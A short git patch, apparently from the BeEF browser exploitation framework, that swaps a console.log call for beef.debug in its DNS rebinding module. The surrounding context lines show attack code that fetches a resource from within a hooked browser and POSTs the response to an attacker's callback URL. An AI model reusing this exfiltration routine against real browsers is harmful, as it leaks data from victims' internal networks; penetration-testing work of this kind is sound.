From 1f00c396c6df876e078b412f33693208aeab4e26 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 19 Jul 2015 10:36:59 +0000 Subject: [PATCH] Replace console.log with beef.debug --- modules/network/dns_rebinding/command.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/network/dns_rebinding/command.js b/modules/network/dns_rebinding/command.js index 3df53c53c..0b3274985 100644 --- a/modules/network/dns_rebinding/command.js +++ b/modules/network/dns_rebinding/command.js @@ -27,7 +27,7 @@ beef.execute(function() { xhr.responseType = 'arraybuffer' xhr.onload = function(e) { var blob = new Blob([this.response], {type: this.getResponseHeader('Content-Type')}); - console.log(blob); + beef.debug(blob); xhr_cb = new XMLHttpRequest(); xhr_cb.open('POST', url_callback+'que=req&&path='+path, false); xhr_cb.send(blob);